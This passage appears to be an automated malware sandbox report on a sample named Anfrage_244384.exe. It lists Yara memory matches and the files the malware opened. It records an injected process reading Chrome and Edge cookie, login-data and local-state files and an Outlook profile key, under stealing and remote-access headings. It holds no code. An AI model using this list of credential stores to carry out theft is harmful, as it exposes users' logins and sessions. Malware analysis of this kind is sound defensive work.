Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 0_2_00405DE5 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 0_2_00405DE5

Stealing of Sensitive Information

Source: Yara match File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\verclsid.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\verclsid.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY